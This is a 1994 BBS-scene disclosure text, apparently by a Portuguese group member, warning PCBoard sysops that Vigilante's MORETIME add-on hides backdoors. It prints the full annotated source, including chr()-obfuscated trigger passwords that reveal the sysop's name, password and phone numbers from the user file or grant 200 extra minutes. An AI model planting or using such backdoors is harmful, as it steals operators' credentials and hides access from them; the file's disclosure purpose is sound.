Hello scene!

This file has only one main objectiv, tell all sysops that VIGILANTE
ppe's have a lot of backdoors. Im gonna explain:

I use a Vigilante's ppe called MORETIME to some cewl users get moretime
but, in some messages VIGILANTE appears fuckin all. So I decide to change
it and start makin some work :) In this ppe I found BACKDOORS, well at least
two, the first is an inofensive one, when ppe asks for the moretime PW
if you type MPMMPMMPMMPM you got more 200 minutes but the second one is a
little more dangerous, if you type when pw is asked 100968 the user see
the follow: SYSOP NAME, SYSOP PW, LOCATIONS AND TEL NUMBERS. What can I 
say? Well I decide to explain all in the follow items.


MORETIME.PPE / MORETIME.PPS BY VIGILANTE


string hidevig,dispamt,password,userpassword,backdoor,lotstime   'Variable
string drive,colon,slash,pcb,bbs,main,users                      '   
integer amount,leftbefore,leftafter,count                        'Defenitions

hidevig = chr(64)+chr(88)+chr(48)+chr(68)+chr(86)+chr(105)+chr(71)+chr(105)+chr(108)+chr(97)+chr(110)+chr(116)+chr(101)
'         
' > variable where you find hidden name (VIGILANTE)
'     chr(xx) ascii carachter xx (check ascii codes)
'     example: chr(64)=@
'              chr(88)=X
'              chr(48)=0 
'              chr(68)=D       @X0D = colour code        
'              chr(86) =V
'              chr(105)=i 
'                 ...
'              chr(116)=t
'              chr(101)=e      Vigilante = sucker name! :)

backdoor = chr(49)+chr(48)+chr(48)+chr(57)+chr(54)+chr(56)
'  
'  > variable where you find the backdoor word, that means the PW where
'      you can run the backdoor who allows to read sysop informations.
'        chr(49)=1
'        chr(48)=0       
'           ...       100968 = backdoor password   
lotstime = chr(77)+chr(80)+chr(77)
'  
'  > variable where you find the word to the second backdoor, this one 
'      gives you more 200 minutes.
'                        MPM = pwd to give more 200 minutes 

leftbefore = minleft()
adjtime 30  
leftafter = minleft()
if (leftbefore = leftafter) then
  println
  println "@X05System event pending, no time can be granted." 
  log " MORETIME: Event approaching, request denied",false
  goto end
else
  adjtime -30
endif

'  
'  > In this part the program checks if some event is coming on board.  
'     If YES do not finish the PPE.            


fopen 1, ppepath() + "moretime.cnf", o_rd, s_dn
fget 1, amount
fget 1, password
fclose 1
'  
'  > In this part the program reads the file MORETIME.CNF and gives AMOUNT
'     and PASSWORD variables in each line of the file.
'            AMOUNT = "first line of the file moretime.cnf"
'          PASSWORD = "second line of the file moretime.cnf"

println
inputstr "@X05Password",userpassword,@X05,12,mask_pwd(),echodots+highascii+upcase+fieldlen
'  
'  > Read the user pw keeping it in a variable called USERPASSWORD

if (userpassword = backdoor) then
  goto hackaway
elseif (userpassword = lotstime+lotstime+lotstime+lotstime) then
  adjtime 200
  goto end
elseif (userpassword <> password) then
  goto nogood
endif
'  
'  >  Here is the place where user pw is checked if is the same by a pre-
'      defined pw to the backdoor (100968)
'      If is the same (USERPASSWORD = BACKDOOR) then program jumps to
'      HACKAWAY.
'      If doesn't match then go checking the second backdoor (MPM) to give
'      200 minutes more.
'      If it's the same gives more 200 min (ADJTIME 200) the finish the PPE.
'      If PW not match the program checks the true pw on the file 
'      MORETIME.CNF (USERPASSWORD <> PASWORD).
'      If pw don't match the program jumps to the next steep NOGOOD
'      If PW matches the program gives the 200 more minutes. Check the
'      follow item:

adjtime amount
dispamt = amount
println
println "@X05WHAM!  Another @X0D" + dispamt + " @X05minutes to leech with, compliments of "+hidevig+"@X05."
log " MORETIME: User granted "+dispamt+" minutes.",false
goto end
'  
'  > Give the minutes configured on moretime.cnf, who was read by AMOUNT
'     variable. (ADJTIME AMOUNTE)

:nogood
beep
println
println "@X05I don't think so, pal.  Ask "+hidevig+"@X05 (or the sysop?) for the password."
log " MORETIME: Password failure, tried ("+userpassword+").",false
goto end
' 
' > Warn user that PW is incorrect.                        

:hackaway  
colon = chr(58)                            ' is the same like:  colon = ":"
slash = chr(92)                            ' is the same like:  slash = "\"    
pcb = chr(112)+chr(99)+chr(98)             ' pcb = "pcb"     
bbs = chr(98)+chr(98)+chr(115)             ' bbs = "bbs"
main = chr(109)+chr(97)+chr(105)+chr(110)  ' main = "main"
users = chr(117)+chr(115)+chr(101)+chr(114)+chr(115) ' users = "users"
' 
' > Backdoors starts working here! Some variables are going to be user
'    down below

for count = 1 to 5                ' Makes a cicle from 1 to 5 to look on   
  drive = chr(count+98)           ' drives (C,D,E,F,G) users file      
                                  ' chr(1+98) = "C"
                                  ' chr(2+98)   "D"
                                  '    ...      ...
                                  ' chr(5+98) = "G"
  if (exist(drive+colon+slash+pcb+slash+main+slash+users)) then 
    fopen 1,drive+colon+slash+pcb+slash+main+slash+users, o_rd, s_dn
    fget 1, backdoor
    println
    println backdoor
    fclose 1
  elseif (exist(drive+colon+slash+pcb+"1"+slash+main+slash+users)) then 
    fopen 1,drive+colon+slash+pcb+"1"+slash+main+slash+users, o_rd, s_dn
    fget 1, backdoor
    println
    println backdoor
    fclose 1
  elseif (exist(drive+colon+slash+bbs+slash+main+slash+users)) then 
    fopen 1,drive+colon+slash+pcb+"1"+slash+main+slash+users, o_rd, s_dn
    fget 1, backdoor
    println
    println backdoor
    fclose 1
  elseif (exist(drive+colon+slash+bbs+"1"+slash+main+slash+users)) then 
    fopen 1,drive+colon+slash+pcb+"1"+slash+main+slash+users, o_rd, s_dn
    fget 1, backdoor
    println
    println backdoor
    fclose 1
'    
'    > Here the ppe search on severals dirs. c:\pcb c:\pcb\main and so on!!
  
  endif
next

:end                             ' END OF PPE
end


So!!! Now I have this PPE free of backdoors and with my handle on it.
I hope this file helps some sys. 
PPE makers should make ppe's without asking for some bucks and free of 
backdoors. I like a lot Vigilante's ppe's they are pretty cewl but free
ppe's not with backdoors.

Pls spread this file.

VIGGO
iNSANE (1994)
Portugal


ahhh one more thing.. I tried the backdoors on a friend of mine on PBC 15.2
and the first one (200 minutes) works but the second one (100968) don't work.
I don't know if the version is the same or if PCB 15.2 has something
different.
